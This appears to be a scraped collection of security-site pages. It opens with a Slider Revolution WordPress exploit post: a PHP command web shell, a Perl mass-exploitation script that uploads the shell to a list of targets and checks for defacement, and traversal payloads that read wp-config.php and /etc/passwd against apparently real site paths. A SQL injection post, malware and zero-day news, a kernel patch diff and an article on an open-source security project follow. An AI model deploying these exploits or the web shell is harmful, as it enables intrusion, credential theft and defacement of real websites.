WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

=================================================================================================  
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |  
| # Author    : indoushka                                                                       |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            |   
| # Vendor    : https://www.sliderrevolution.com/                                               |    
| # Dork      : index off revslider\backup                                                      |    
                plugins/revslider/public/assets/css/settings.css                                |  
                revslider.php "index of"                                                      |                                    
                wp-content/plugins/revslider/ 2013                                              |  
=================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to upload backdoor through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]  
  Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl

 use LWP::UserAgent;

 system(($^O eq 'MSWin32') ? 'cls' : 'clear');

 head();

 my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";  
die "$usage" unless $ARGV[0];

 open(tarrget,"<$ARGV[0]") or die "$!";  
while(<tarrget>){  
chomp($_);  
$target = $_;

 my $path = "wp-admin/admin-ajax.php";

 print "\nTarget => $target\n";

 my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");  
my $req = $ua->get("$target/$path");  
if($req->is_success) {  
print "\n  [+] Xploit Possibility Work :3\n \n";

   print "  [*] Try Exploiting Vulnerability\n";  
print "  [*] Xploiting $target\n";

 my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

 print "  [*] Sent payload\n";

 if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "  [+] Payload successfully executed\n";

 print "  [*] Checking if shell was uploaded\n";  
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;  
if($check =~/<br>/) {

     print "  [+] Shell successfully uploaded\n";  
    open(save, '>>Shell.txt');  
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";  
    close(save);

  print "  [*] Checking if Deface was uploaded now\n";

 my $def = $ua->get("$target/leet.html")->content;  
if($def = ~/Hacked/) {

 print "  [+] Deface uploaded successfull\n";

  } else {print "   [-] Deface not Uploaded :/"; }  
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }  
} else {  
print "  [-] Payload failed: Fail\n";  
print "\n";

 }  
} else { print "\n [-]Xploit Fail \n"}

 sub head {  
print "\t   +===============================================\n";  
print "\t   | Auto Exploiter Revslider Shell Upload \n";  
print "\t   | Edited: indoushka\n";  
print "\t   +===============================================\n";  
}  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.x.x Shell Upload

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.9.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474

Download | Favorite | View

**WordPress Slider Revolution 4.9.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.9.2 Directory Traversal

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.3 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 83b023ff748b63a814933d6674398e32e4fb2ba5c520cc7997e01b2a23da875c

Download | Favorite | View

**WordPress Slider Revolution 4.1.3 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.3 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/sse.sg/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.3 Directory Traversal

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Profile Builder 3.0.5 SQL Injection

Remote access trojans such as StrRAT and Ratty are being distributed as a combination of polyglot and malicious Java archive (JAR) files, once again highlighting how threat actors are continuously finding new ways to fly under the radar.
"Attackers now use the polyglot technique to confuse security solutions that don't properly validate the JAR file format," Deep Instinct security researcher

Cyber Threat / Malware Detection

Remote access trojans such as StrRAT and Ratty are being distributed as a combination of polyglot and malicious Java archive (JAR) files, once again highlighting how threat actors are continuously finding new ways to fly under the radar.

"Attackers now use the polyglot technique to confuse security solutions that don't properly validate the JAR file format," Deep Instinct security researcher Simon Kenin said in a report.

Polyglot files are files that combine syntax from two or more different formats in a manner such that each format can be parsed without raising any error.

One such 2022 campaign spotted by the cybersecurity firm is the use of JAR and MSI formats – i.e., a file that's valid both as a JAR and an MSI installer – to deploy the StrRAT payload. This also means that the file can be executed by both Windows and Java Runtime Environment (JRE) based on how it's interpreted.

Another instance involves the use of CAB and JAR polyglots to deliver both Ratty and StrRAT. The artifacts are propagated using URL shortening services such as cutt.ly and rebrand.ly, with some of them hosted on Discord.

"What's special about ZIP files is that they're identified by the presence of an end of central directory record which is located at the end of the archive," Kenin explained. "This means that any 'junk' we append in the beginning of the file will be ignored and the archive is still valid."

The lack of adequate validation of the JAR files results in a scenario where malicious appended content can bypass security software and stay undetected until they are executed on the compromised hosts.

This is not the first time such malware-laced polyglots have been detected in the wild. In November 2022, Berlin-based DCSO CyTec unearthed an information stealer dubbed StrelaStealer that's spread as a DLL/HTML polyglot.

"The proper detection for JAR files should be both static and dynamic," Kenin said. "It's inefficient to scan every file for the presence of an end of central directory record at the end of the file."

"Defenders should monitor both 'java' and 'javaw' processes. If such a process has '-jar' as an argument the filename passed as an argument should be treated as a JAR file regardless of the file extension or the output of the Linux 'file' command."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Using Polyglot Files in Malware Distribution to Fly Under the Radar

A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.
"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week.
The

Zero-Day / Incident Response

A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.

"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week.

The attacks entailed the exploitation of CVE-2022-42475, a heap-based buffer overflow flaw that could enable an unauthenticated remote attacker to execute arbitrary code via specifically crafted requests.

The infection chain analyzed by the company shows that the end goal was to deploy a generic Linux implant modified for FortiOS that's equipped to compromise Fortinet's intrusion prevention system (IPS) software and establish connections with a remote server to download additional malware and execute commands.

Fortinet said it was unable to recover the payloads used in the subsequent stages of the attacks. It did not disclose when the intrusions took place.

In addition, the modus operandi reveals the use of obfuscation to thwart analysis as well as "advanced capabilities" to manipulate FortiOS logging and terminate logging processes to remain undetected.

"It searches for elog files, which are logs of events in FortiOS," the researchers said. "After decompressing them in memory, it searches for a string the attacker specifies, deletes it, and reconstructs the logs."

The network security company also noted that the exploit requires a "deep understanding of FortiOS and the underlying hardware" and that the threat actor possesses skills to reverse engineer different parts of FortiOS.

"The discovered Windows sample attributed to the attacker displayed artifacts of having been compiled on a machine in the UTC+8 timezone, which includes Australia, China, Russia, Singapore, and other Eastern Asian countries," it added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FortiOS Flaw Exploited as Zero-Day in Attacks on Government and Organizations

In rndis_query_oid in drivers/net/wireless/rndis_wlan.c in the Linux kernel through 6.1.5, there is an integer overflow in an addition.

@@ -697,7 +697,7 @@  static int rndis\_query\_oid(struct usbnet \*dev, u32 oid, void \*data, int \*len)
 		struct rndis\_query\_c	\*get\_c;
 	} u;
 	int ret, buflen;
\-	int resplen, respoffs, copylen;
+	u32 resplen, respoffs, copylen;
 
 	buflen = \*len + sizeof(\*u.get);
 	if (buflen < CONTROL\_BUFFER\_SIZE)
@@ -740,7 +740,7 @@  static int rndis\_query\_oid(struct usbnet \*dev, u32 oid, void \*data, int \*len)
 			goto exit\_unlock;
 		}
 
\-		if ((resplen + respoffs) > buflen) {
+		if (resplen > (buflen - respoffs)) {
 			/\* Device would have returned more data if buffer would
 			 \* have been big enough. Copy just the bits that we got.
 			 \*/

CVE-2023-23559: rndis_wlan: Prevent buffer overflow in rndis_query_oid

SBOMs aren't enough. OpenSSF's Alpha-Omega brings in new blood to help secure the open source projects most impactful to the software supply chain.

The intricate labyrinth of open source dependencies across the global software supply chain has created an application security puzzle of mammoth proportions. Whether open source or closed, most of the world's software today is built on third-party components and libraries. Consequently, one piece of vulnerable code in even the smallest of open source projects can have a domino effect that impacts thousands of other applications, APIs, cloud infrastructure components, and more.

This issue is becoming one of the most pressing security concerns of CISOs today, and at an individual enterprise level, organizations are hard at work tackling it with projects like building out software bills of materials (SBOMs), establishing open source security management standards, and creating technical guardrails for developers to follow them.

But these efforts don't necessarily solve the problem at a more systemic level. According to many experts in the open source community, in order to make the biggest dent in the downstream supply chain, more effort needs to be put into helping open source project maintainers clean up their code.

This is the goal of the Alpha-Omega Project. About to hit its one-year anniversary next month, Alpha-Omega is a big-picture security project put together by the Open Source Security Foundation (OpenSSF) and its parent organization, the Linux Foundation, to address the fundamental issues in software supply chain security.

The "Alpha" side of the project is focused on collaborating with the maintainers of the open source projects most critical to the broader supply chain — including notables like node and jQquery — to help them level up the security posture of their code. These are projects hand-selected by the OpenSSF Securing Critical Projects working group using expert opinion and data from benchmarks like the Open SSF Criticality Score to determine the projects with the biggest downstream impact.

The "Omega" side of the project turns to the long-tail of software supply chain security, using automation and tooling to identify critical security vulnerabilities across a range of 10,000 widely deployed open source projects. It's an effort to scale up the remediation of the lowest-hanging, most obvious flaws that are pervasive across the supply chain.

Funded initially by Google and Microsoft, with additional toolchain and personnel support from financial giant Citi, Alpha-Omega wrapped up 2022 by snagging an additional $2.5 million from Amazon Web Services. More crucially, the project is preparing for 2023 with two new critical hires — Yesenia Yser, formerly a product security engineer for Red Hat, and Jonathan Leitschuh, who just finished up his one-year stint as the first Dan Kaminsky Fellow for Human Security. Yser steps in as a senior software security engineer, and Leitschuh will continue his research on automating open source security research and remediation as a senior software security researcher.

**Alpha-Omega Project's First Year**

This project is one of several high-profile security projects spearheaded and fundraised by OpenSSF and Linux Foundation in the past year to tackle the systemic issues in open source security. Following the organizations' successful model for rapid funding and action on security projects, Alpha-Omega has already made headway on a number of significant fronts.

According to the project's first annual report, the project has already engaged with five different open source projects: Node.js, the Eclipse Foundation, the Rust Foundation, jQuery, and the Python Software Foundation. Over the course of 2022, Alpha-Omega doled out $1.5 million in grants to different projects, including $460,000 to the Rust Foundation, $400,000 to the Eclipse Foundation, and $300,000 to Node. In the case of Node, that support helped it reactivate the Node Security Working Group and get it working on a security and threat model for Node.js. It also spurred the triaging of 20 different vulnerability reports across the project's code base.

Additionally, Alpha-Omega recently released the initial version of the Omega Analysis Toolchain, which orchestrates 27 different security analyzers for identifying critical vulnerabilities in open source packages. The project also released a number of experimental tools, including a triage portal to make security research and reporting more efficient.

For year two, the project plans to accelerate work on the Omega side of the house.

**What 2023 Has in Store for the Project**

The addition of Yser and Leitschuh to the Alpha-Omega Project will not only infuse more brainpower, time, and talent into existing efforts, but also plenty of enthusiasm for moving the needle on open source security.

"Open source software is in every piece of equipment that is used today, from our automotives, airplanes, phones, trackers, and even utility systems," says Yser, who has deep roots in the DevSecOps and software supply chain worlds. In her position at Red Hat she was the supply chain ops technical lead.

"The vision for the project has a global impact of improving the security posture of open source software, supply chain security, and the lives of folks around the world," she says.

Yser will be working directly on improving the Omega toolchain and the triage portal to help engineer improvements in how projects and vulnerability impacts are analyzed and prioritized for mitigation.

"For the Omega tool chain, a goal for this year will be to have an operationalized system that a maintainer or developer can leverage," she says. "For the Triage Portal, the goal will be to support a researcher's ability to triage a discovered finding via importing a SARIF report to the portal and handle their investigation within the system. The system will remain limited to the Alpha-Omega team until noted otherwise, but thanks to open source software, a researcher can run their own instance and submit pull requests to the repository and support the overall mission."

Yser will be working in close collaboration with Leitschuh, who brings significant and very fresh experience to bear in the area of scaling and automating fixes across open source projects. He spent last year's fellowship working on this exact problem. His goal is to continue the work he did there and use what he learned to further his mission of rooting out the most prevalent and impactful flaws lurking across a wide swath of open source projects.

"We may not know where those little pegs are that are holding up the entire software industry exist," Leitschuh says. "It could be one of those tiny little pieces of software that has 15 stars on GitHub that nobody knows, but it's holding up the entire Internet. So how do we secure those projects that no one knows about but \[are\] somehow fundamental to the entire supply chain?"

He says his work during the fellowship helped him further home in on his niche of not necessarily going very deep on any one security vulnerability, but instead looking at a certain type of vulnerability and developing automated ways of finding that same flaw in lots of different places across the open source ecosystem. This dovetails perfectly with the Omega ethos, which is what led him to his newest gig.

Leitschuh will keep supporting refinements on automated methods for running down flaws in Data Flow and Control analysis and auto pull request generation. But he's also going to be continuing the very manual work of collaboration. One of the important lessons he learned last year is that a lot of the work ahead of him and his Alpha-Omega team is not necessarily technical. It's about building relationships with maintainers to help them see how sometimes even simple fixes to their projects can have a huge impact on global software supply chain security postures.

"Technologists and software people, we don't always love the human element — it's easier for us to sit down and write a line of code that detects this thing and throw it over a wall than it is for us to engage with an actual person and try to convince them this is a thing worth fixing," he says.

He explains how one instance last year illustrates this point perfectly. In this case he worked with a maintainer of a YAML Parser that had a 6-year-old remote code execution flaw that had a lot of downstream impact. For a long time when Leitschuh approached him about it, the maintainer told him, "Don't trust untrusted YAML. This is not my vulnerability."

Finally, after sitting the maintainer down in a video call with lots of technical debate, Leitschuh was able to show him that the change he requested was extremely narrow and could have a huge impact.

